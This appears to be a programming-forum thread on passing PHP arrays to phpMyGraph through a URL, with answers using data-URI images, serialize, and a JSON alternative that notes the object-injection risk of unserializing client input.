But I get the error "provided data is not an array"
I can't see what's wrong with it?
if I do var_dump($data_daily) I get:
array(8) { ["14/12/2011"]=> string(1) "0" ["13/12/2011"]=> string(2)
"11" ["12/12/2011"]=> string(1) "0" ["11/12/2011"]=> string(1) "2"
["10/12/2011"]=> string(1) "9" ["09/12/2011"]=> string(1) "3"
["08/12/2011"]=> string(1) "6" ["07/12/2011"]=> string(1) "6" }
UPDATE2:
var_dump($data1); gives:
array(12) { ["Jan"]=> int(12) ["Feb"]=>
int(25) ["Mar"]=> int(0) ["Apr"]=> int(7) ["May"]=> int(80) ["Jun"]=>
int(67) ["Jul"]=> int(45) ["Aug"]=> int(66) ["Sep"]=> int(23)
["Oct"]=> int(23) ["Nov"]=> int(78) ["Dec"]=> int(23) }
and var_dump($s_data1 = serialize($data1)) gives:
a:12:s:3:"Jan";i:12;s:3:"Feb";i:25;s:3:"Mar";i:0;s:3:"Apr";i:7;s:3:"May";i:80;s:3:"Jun";i:67;s:3:"Jul";i:45;s:3:"Aug";i:66;s:3:"Sep";i:23;s:3:"Oct";i:23;s:3:"Nov";i:78;s:3:"Dec";i:23;}
Then unserialize($s_data1); gives the same thing than $data1
So the argument 1 of the parse should be correct... I can’t see what is wrong
I finally gave up and loaded my arrays in graph.php:
if ($_GET['data'] == 'daily'){
$cfg['title'] = 'daily';
$graph->parseVerticalPolygonGraph($data_daily, $cfg);
}
And I call the file like that:
echo "<img src=\"graph.php?data=daily\">";
Thanks for your help anyway
I previously needed a page to display multiple graphs using phpMyGraph and the approach I took was to use data URI's and php's ob_start() and ob_get_clean()
Simply use this for each graph:
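// Capture the image bytes that phpMyGraph writes to the output stream.
ob_start();
$graph->parseVerticalPolygonGraph($data, $cfg);
$img = ob_get_clean();
// Close the single-quoted src attribute before ending the tag; without the
// closing quote the browser keeps reading the following markup as part of the URI.
echo "<img src='data:image/gif;base64," . base64_encode($img) . "' />";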
I recommend using gif's for the format since that way your page size will not be huge, you can do this by setting $cfg["type"] to "gif" (See here http://phpmygraph.abisvmm.nl/#ConfigDirectives)
This will also reduce the overhead of multiple requests and prevent hotlinking to the images.
You can read more about data URI's here
http://en.wikipedia.org/wiki/Data_URI_scheme
you might want to try
echo "< img src=\"graph.php?data=".urlencode(serialize($data_daily))."\">"
I might be misunderstanding which script is throwing the error, however (I'm presuming that it's graph.php that's giving you the provided data is not an array).
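Try using json instead of serialize. Besides surviving the trip through the URL more easily, this avoids calling unserialize() on $_GET['data']: unserializing a value that the client controls can instantiate arbitrary objects (PHP object injection), whereas json_decode() with the second argument set to true only yields arrays and scalars.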
echo "< img src=\"graph.php?data=".urlencode(json_encode($data_daily))."\">"
$graph->parseVerticalPolygonGraph(json_decode($_GET['data'],true), $cfg);
I see no reason for this to throw an error.
